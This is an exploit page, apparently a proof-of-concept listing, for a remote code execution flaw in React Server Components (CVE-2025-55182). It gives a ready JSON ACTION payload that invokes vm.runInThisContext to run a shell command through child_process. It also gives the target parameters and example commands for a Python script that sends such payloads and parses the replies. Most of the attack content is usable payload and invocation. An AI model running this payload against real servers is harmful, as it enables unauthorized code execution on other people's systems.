## https://sploitus.com/exploit?id=5D4E6A84-80C0-587B-91D3-D771BA6F521E
## **CVE-2025-55182 โ React Server Components RCE Proof of Concept**
This project is **CVE-2025-55182 โ React Server Components (RSC) RCE Proof of Concept**. It demonstrates that under certain conditions, remote code execution can be triggered using **`vm.runInThisContext`** and **malicious ACTION payloads**. **Python side**: Automatically sends malicious ACTION payloads and parses the responses.
---
### **Vulnerability Overview (CVE-2025-55182)**
The **ACTION payload** from **React Server Components** can, under certain conditions,:
- **Be deserialized into a JS object**
- **Execute through `vm.runInThisContext`**
- **Be automatically injected into server actions**
An attacker can construct a payload like this:
```json
{
"$ACTION_REF_0": "",
"$ACTION_0:0": "{\"id\": \"vm#runInThisContext\", \"bound\": [\"global.process.mainModule.require('child_process').execSync('calc').toString()\"]}"
}
```
| Parameter | Required | Default | Description |
|---------|----------|---------|-------------|
| `--host` | Yes | None | IP or domain name of the target server. Example: `127.0.0.1`, `192.168.1.10`, `example.com` |
| `--port` | No | `80` | Target HTTP service port. Example: `3003` |
| `--path` | Yes | None | Route path that can trigger the vulnerability. Example: `/feedback`, `/action` |
| `--https` | No | `False`| Whether to send the payload via HTTPS (default: HTTP) |
**Example command on Python side:**
```
python a.py --host --port --path
```
**Example command on Python side with target host 127.0.0.1, port 3003, and path `/feedback`:**
```
python a.py --host 127.0.0.1 --port 3003 --path /feedback
```